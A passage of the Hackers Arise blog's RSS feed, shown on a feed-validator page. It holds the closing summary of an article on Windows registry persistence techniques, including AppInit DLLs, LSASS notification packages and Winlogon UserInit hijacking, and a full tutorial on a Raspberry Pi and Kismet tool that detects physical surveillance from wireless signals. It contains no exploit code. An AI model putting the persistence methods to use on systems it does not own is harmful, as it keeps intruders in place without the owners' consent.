Windows persistence through registry modifications offers multiple paths, from legacy AppInit DLL injection to LSASS notification packages, Winlogon UserInit hijacking, and Office registry keys under HKCU. Each of these methods survives reboots, ensuring repeated code execution, but they vary in scope and stealth. AppInit and Office rely on application startup, while LSASS and Winlogon provide broader and more privileged coverage. All require different levels of access, with the most powerful options also being the loudest in telemetry and the riskiest to system stability. For defenders, the key takeaway is clear: monitoring critical registry keys under HKLM and HKCU, watching for unusual DLL or executable loads, and ensuring proper auditing are essential.The post <a href="https://hackers-arise.com/advanced-windows-persistence-part-2-using-the-registry-to-maintain-persistence/">Advanced Windows Persistence, Part 2: Using the Registry to Maintain Persistence</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
</item>
<item>
<title>Counter-Surveillance: How to Know Whether You Are Being Followed</title>
<link>https://hackers-arise.com/physical-surveillance-detection-using-chasing-your-tail-to-know-if-youre-being-followed/</link>
<dc:creator><![CDATA[aircorridor]]></dc:creator>
<pubDate>Mon, 08 Sep 2025 13:52:37 +0000</pubDate>
<category><![CDATA[Physical Security]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=17955</guid>
<description><![CDATA[Welcome back, aspiring cyberwarriors! In our line of work, situational awareness is everything. Whether you’re conducting a sensitive penetration test, meeting with a whistleblower, or simply need to know if that black sedan has been behind you for the last three stops – having the ability to detect physical surveillance could be the difference between […]
The post <a href="https://hackers-arise.com/physical-surveillance-detection-using-chasing-your-tail-to-know-if-youre-being-followed/">Counter-Surveillance: How to Know Whether You Are Being Followed</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, aspiring cyberwarriors!
In our line of work, situational awareness is everything. Whether you’re conducting a sensitive penetration test, meeting with a whistleblower, or simply need to know if that black sedan has been behind you for the last three stops – having the ability to detect physical surveillance could be the difference between mission success and complete compromise.
Traditional counter-surveillance requires extensive training and constant vigilance. But nowadays, a simple Raspberry Pi setup could be your digital eyes and ears, automatically detecting if the same digital signatures are following you from location to location.
As you know, every device around us is constantly broadcasting its digital fingerprints through Wi-Fi probe requests, Bluetooth advertisements, and other wireless signals. A skilled operative or private investigator following you will likely have multiple devices – phones, tablets, surveillance equipment – all creating a unique digital signature that can be tracked.
Matt Edmondson, a digital forensics expert, presented this great technique at Black Hat USA 2022. The concept is elegantly simple: if you see the same devices at Starbucks, then at the gas station, then at the bookstore – somebody might be following you. Let’s learn how to build and deploy this powerful surveillance detection system!
<h2 class="wp-block-heading">What is “Chasing Your Tail”?</h2>
“Chasing Your Tail” is a comprehensive Wi-Fi and Bluetooth surveillance detection system that passively monitors wireless devices in your vicinity. By analyzing probe requests and device persistence across multiple locations and time windows, it can identify potential surveillance with remarkable accuracy.
The system works by:
<ul class="wp-block-list">
<li>Passively capturing Wi-Fi probe requests and Bluetooth advertisements</li>
<li>Creating time-based persistence profiles of nearby devices</li>
<li>Correlating device appearances across multiple locations</li>
<li>Generating alerts when suspicious patterns emerge</li>
<li>Providing GPS-correlated tracking and professional visualizations</li>
</ul>
<h2 class="wp-block-heading">Hardware Arsenal</h2>
For this operation, you’ll need some basic hardware. The beauty of this system is that it uses common, inexpensive components that won’t raise suspicion:
Essential Gear:
<ul class="wp-block-list">
<li>Raspberry Pi</li>
<li>Wi-Fi adapter with monitor mode support</li>
<li>Portable battery pack – For extended operations</li>
<li>Small display screen – For real-time monitoring (optional but recommended)</li>
<li>32GB+ SD card – For data storage and logging</li>
</ul>
Professional Setup:
<ul class="wp-block-list">
<li>Multiple Wi-Fi adapters – For enhanced coverage</li>
<li>External GPS module – For precise location correlation</li>
<li>Pelican case or similar – For protecting your gear</li>
</ul>
<h2 class="wp-block-heading">Software Arsenal</h2>
We’ll be deploying several key components:
Kismet – Our primary packet capture engine. This open-source tool captures Wi-Fi, Bluetooth, and other wireless protocols, storing everything in SQLite databases for analysis.
Chasing Your Tail NG – The enhanced, security-hardened version of the original tool with GPS integration, advanced analytics, and professional reporting.
WiGLE API Integration – For correlating captured SSIDs with global geolocation data (optional).
<h2 class="wp-block-heading">Step #1: Base System Setup</h2>
First, we need to prepare our Linux environment. I’m using a Raspberry Pi 4, but technically any version should be suitable.
Install the essential packages:
raspberrypi> sudo apt install build-essential git libwebsockets-dev pkg-config \ zlib1g-dev libnl-3-dev libnl-genl-3-dev libcap-dev libpcap-dev \ libnm-dev libdw-dev libsqlite3-dev libprotobuf-dev libprotobuf-c-dev \ protobuf-compiler protobuf-c-compiler libsensors-dev libusb-1.0-0-dev \ python3 python3-setuptools python3-protobuf python3-requests \ python3-numpy python3-serial python3-usb python3-dev python3-websockets \ libubertooth-dev libbtbb-dev libmosquitto-dev librtlsdr-dev
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="881" height="370" src="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_packages.webp" alt="" class="wp-image-17956" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_packages.webp 881w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_packages-300x126.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_packages-768x323.webp 768w" sizes="(max-width: 881px) 100vw, 881px" /></figure>
<h2 class="wp-block-heading">Step #2: Install Kismet</h2>
Firstly download the source code:
raspberrypi> git clone <a href="https://www.kismetwireless.net/git/kismet.git">https://www.kismetwireless.net/git/kismet.git</a>
raspberrypi> cd kismet
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="881" height="232" src="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_clone.webp" alt="" class="wp-image-17957" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_clone.webp 881w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_clone-300x79.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_clone-768x202.webp 768w" sizes="(max-width: 881px) 100vw, 881px" /></figure>
Run the configure script to prepare the source code for your system by checking dependencies and generating a custom build configuration.
raspberrypi> ./configure
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="884" height="282" src="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_configure.webp" alt="" class="wp-image-17958" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_configure.webp 884w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_configure-300x96.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_configure-768x245.webp 768w" sizes="(max-width: 884px) 100vw, 884px" /></figure>
Next, compile the source code into binaries using <code>make</code>. To learn more about the <code>make</code> command in Linux, check out this <a href="https://hackers-arise.com/linux-basics-for-hackers-the-make-command-compiling-and-installing-software-from-source-in-linux/" title="">article</a>.
raspberrypi> make
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="883" height="235" src="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_make.webp" alt="" class="wp-image-17960" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_make.webp 883w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_make-300x80.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_make-768x204.webp 768w" sizes="(max-width: 883px) 100vw, 883px" /></figure>
It’s important to keep in mind that on a Raspberry Pi, even with swap enabled, compiling a large project like Kismet will be slow. Depending on the CPU speed and RAM size, it may take hours.
By the way, if you encounter an error similar to the one below:
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="881" height="174" src="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_error.webp" alt="" class="wp-image-17961" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_error.webp 881w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_error-300x59.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_error-768x152.webp 768w" sizes="(max-width: 881px) 100vw, 881px" /></figure>
Consider increasing the swap size, especially if you decide to run not just <code>make</code> but <code>make -j$(nproc)</code>. The <code>-jN</code> option tells <code>make</code> to run N jobs in parallel, and <code>$(nproc)</code> expands to the number of CPU cores (on a Raspberry Pi 4 → 4). However, using this command can be risky because you might encounter an OOM (Out of Memory) error.
Finally, we can install Kismet. In general, you should install Kismet as <code>suid-root</code>; it will automatically create a group and install the capture binaries accordingly. When installed as <code>suid-root</code>, Kismet launches the binaries that control channels and interfaces with the required privileges, while keeping packet decoding and the web interface running without root privileges.
raspberrypi> sudo make suidinstall
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="886" height="297" src="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_suidinstall.webp" alt="" class="wp-image-17963" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_suidinstall.webp 886w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_suidinstall-300x101.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_suidinstall-768x257.webp 768w" sizes="(max-width: 886px) 100vw, 886px" /></figure>
<code>make suidinstall </code>will automatically create a <code>kismet </code>group. To run Kismet, your user needs to be part of this group. So let’s add our user to this group.
raspberrypi> sudo usermod -aG kismet
Groups are not updated automatically; you will need to reload the groups for your user.
Either log back out and log in, or in some cases, reboot.
Check that you are in the Kismet group with:
raspberrypi> groups
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="891" height="529" src="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_groups.webp" alt="" class="wp-image-17964" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_groups.webp 891w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_groups-300x178.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_groups-768x456.webp 768w" sizes="(max-width: 891px) 100vw, 891px" /></figure>
If you are not in the kismet group, you should log out and log back in, or reboot – some session and desktop managers don’t reload the groups on logout, either.
<h2 class="wp-block-heading">Step #3: Install Chasing Your Tail NG</h2>
raspberrypi>git clone https://github.com/ArgeliusLabs/Chasing-Your-Tail-NG.git
raspberrypi> cd Chasing-Your-Tail-NG
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="885" height="232" src="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_clone_chaising_tail.webp" alt="" class="wp-image-17966" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_clone_chaising_tail.webp 885w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_clone_chaising_tail-300x79.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_clone_chaising_tail-768x201.webp 768w" sizes="(max-width: 885px) 100vw, 885px" /></figure>
After downloading we need to install the required packages.
raspberrypi> pip3 install -r requirements.txt –break-system-packages
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="883" height="226" src="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_requirements.webp" alt="" class="wp-image-17967" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_requirements.webp 883w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_requirements-300x77.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_requirements-768x197.webp 768w" sizes="(max-width: 883px) 100vw, 883px" /></figure>
In the command below, I’ve used –break-system-packages flag to forces the install even if it might conflict with system packages.
<h2 class="wp-block-heading">Step #5: Security Hardening</h2>
The current version of “Chasing Your Tail” includes security hardening to prevent SQL injection attacks and secure credential management. Run the migration script:
raspberrypi> python3 migrate_credentials.py
This script eliminates critical vulnerabilities and sets up encrypted credential storage. Verify the security implementation:
raspberrypi> python3 chasing_your_tail.py
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="883" height="443" src="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_security_hardening.webp" alt="" class="wp-image-17968" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_security_hardening.webp 883w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_security_hardening-300x151.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_security_hardening-768x385.webp 768w" sizes="(max-width: 883px) 100vw, 883px" /></figure>
Here we can see different warnings and errors, but those aren’t important for us right now. What matters is the INFO message confirming that the configuration loaded with secure credential management.
<h2 class="wp-block-heading">Step #6: Configuration</h2>
Now we need to configure our system for optimal surveillance detection. Edit the main configuration:
raspberrypi> nano config.json
Example of the configurations:
<pre class="wp-block-code"><code>{
"paths": {
"base_dir": ".",
"log_dir": "logs",
"kismet_logs": "/home/pi/Chasing-Your-Tail-NG/*.kismet",
"ignore_lists": {
"mac": "mac_list.py",
"ssid": "ssid_list.py"
}
},
"timing": {
"check_interval": 60,
"list_update_interval": 5,
"time_windows": {
"recent": 5,
"medium": 10,
"old": 15,
"oldest": 20
}
},
"search": {
"lat_min": 31.3,
"lat_max": 37.0,
"lon_min": -114.8,
"lon_max": -109.0
}
}</code></pre>
Key settings:
<ul class="wp-block-list">
<li>timing: Overlapping surveillance detection windows</li>
<li>kismet_logs: Path to the log directory</li>
</ul>
<h2 class="wp-block-heading">Step #7: Wireless Interface Configuration</h2>
Your Wi-Fi adapter MUST support monitor mode. Test your setup:
raspberrypi> sudo airmon-ng start wlan0
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="882" height="434" src="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_monitor_mode.webp" alt="" class="wp-image-17969" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_monitor_mode.webp 882w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_monitor_mode-300x148.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_monitor_mode-768x378.webp 768w" sizes="(max-width: 882px) 100vw, 882px" /></figure>
Replace <code>wlan</code>1 with your actual interface. This should create a monitor interface (usually <code>wlan1mon</code>). If this fails, your adapter doesn’t support monitor mode — you’ll need different hardware.
In my case, I’m using a TP-Link Wi-Fi adapter with the RTL8xxxu chipset, which requires additional setup to work. If you’re using, for example, an Alfa AWUS036ACS adapter, you likely won’t encounter any issues with enabling monitor mode. But for the sake of clarity, I’ll briefly show you how I set it up:
List physical wireless devices:
raspberrypi> iw phy
Look for the one corresponding to <code>wlan1</code> (in my case, it’s <code>phy1</code>).
Add a new monitor-mode virtual interface (e.g., <code>mon0</code>):
raspberrypi> sudo iw phy phy1 interface add mon0 type monitor
Bring up the new monitor interface:
raspberrypi> sudo ip link set mon0 up
Stop NetworkManager only on the specific interface you want to monitor, not the entire service:
raspberrypi> sudo nmcli dev set wlan1 managed no
<h2 class="wp-block-heading">Step #7: Deploying</h2>
Terminal 1 – Start Kismet:
raspberrypi> ./start_kismet_clean.sh
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="885" height="231" src="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_start_kismet_error.webp" alt="" class="wp-image-17972" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_start_kismet_error.webp 885w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_start_kismet_error-300x78.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_start_kismet_error-768x200.webp 768w" sizes="(max-width: 885px) 100vw, 885px" /></figure>
You might see the following error due to a hardcoded path. Edit it to the correct one using your favorite text editor. In my case, the correct directory is <code>/home/pi/Chasing-Your-Tail-NG</code>:
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="885" height="462" src="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_start_kismet_config.webp" alt="" class="wp-image-17973" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_start_kismet_config.webp 885w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_start_kismet_config-300x157.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_start_kismet_config-768x401.webp 768w" sizes="(max-width: 885px) 100vw, 885px" /></figure>
Also, check that the starting command for Kismet uses the correct interface. After these changes, the Kismet script should not print any errors.
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="895" height="146" src="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_start_kismet.webp" alt="" class="wp-image-17974" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_start_kismet.webp 895w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_start_kismet-300x49.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_start_kismet-768x125.webp 768w" sizes="(max-width: 895px) 100vw, 895px" /></figure>
Terminal 2 – Launch Core Monitoring:
raspberrypi> python3 chasing_your_tail.py
You’ll see an output like below.
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="884" height="436" src="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_core_monitoring.webp" alt="" class="wp-image-17975" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_core_monitoring.webp 884w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_core_monitoring-300x148.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_core_monitoring-768x379.webp 768w" sizes="(max-width: 884px) 100vw, 884px" /></figure>
Terminal 3 – Real-time Analysis:
raspberrypi> python3 surveillance_analyzer.py
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="886" height="482" src="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_real_time_analysys.webp" alt="" class="wp-image-17976" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_real_time_analysys.webp 886w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_real_time_analysys-300x163.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_real_time_analysys-768x418.webp 768w" sizes="(max-width: 886px) 100vw, 886px" /></figure>
After running the script, we’ll receive professional intelligence reports in both MD and HTML formats.
Example of the report:
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="799" height="337" src="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_report.png" alt="" class="wp-image-17977" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/cyt_report.png 799w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_report-300x127.png 300w, https://hackers-arise.com/wp-content/uploads/2025/09/cyt_report-768x324.png 768w" sizes="(max-width: 799px) 100vw, 799px" /></figure>
<h2 class="wp-block-heading">Understanding the Intelligence</h2>
<h3 class="wp-block-heading">Time Window Analysis</h3>
The system maintains four overlapping surveillance detection windows:
<ul class="wp-block-list">
<li>Recent: Past 5 minutes – immediate threats</li>
<li>Medium: 5-10 minutes ago – establishing patterns</li>
<li>Old: 10-15 minutes ago – confirming persistence</li>
<li>Oldest: 15-20 minutes ago – long-term tracking</li>
</ul>
<h3 class="wp-block-heading">Threat Assessment Algorithms</h3>
The system uses advanced algorithms to analyze:
<ul class="wp-block-list">
<li>Temporal Persistence: How consistently devices appear over time</li>
<li>Location Correlation: Devices following you across multiple locations</li>
<li>Probe Pattern Analysis: Suspicious network search behaviors</li>
<li>GPS Correlation: Physical movement patterns matching your own</li>
</ul>
<h3 class="wp-block-heading">Persistence Scoring</h3>
Each device receives a threat score (0-1.0):
<ul class="wp-block-list">
<li>0.0-0.3: Background noise, likely benign</li>
<li>0.4-0.6: Possible coincidence, worth monitoring</li>
<li>0.7-0.8: High probability of surveillance</li>
<li>0.9-1.0: Active surveillance confirmed</li>
</ul>
<h2 class="wp-block-heading">Summary</h2>
In this tutorial, we covered the complete deployment of “Chasing Your Tail” – from hardware selection and security-hardened installation to operational deployment and professional intelligence analysis for detecting physical surveillance.
“Chasing Your Tail” is a big step forward in personal counter-surveillance. It uses common hardware and open-source software to give people powerful tools that used to require lots of training and expensive gear.
With features like real-time monitoring, GPS tracking, smart analysis, and clear visual displays, it helps users stay aware in risky situations.
The post <a href="https://hackers-arise.com/physical-surveillance-detection-using-chasing-your-tail-to-know-if-youre-being-followed/">Counter-Surveillance: How to Know Whether You Are Being Followed</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
</item>
</channel>
</rss>

If you would like to create a banner that links to this page (i.e. this validation result), do the following:

Download the "valid RSS" banner.
Upload the image to your own server. (This step is important. Please do not link directly to the image on this server.)
Add this HTML to your page (change the image src attribute if necessary):

<a href="http://www.feedvalidator.org/check.cgi?url=https%3A//www.hackers-arise.com/blog-feed.xml"><img src="valid-rss-rogers.png" alt="[Valid RSS]" title="Validate my RSS feed" /></a>

If you would like to create a text link instead, here is the URL you can use:

http://www.feedvalidator.org/check.cgi?url=https%3A//www.hackers-arise.com/blog-feed.xml

Home · About · News · Docs · Terms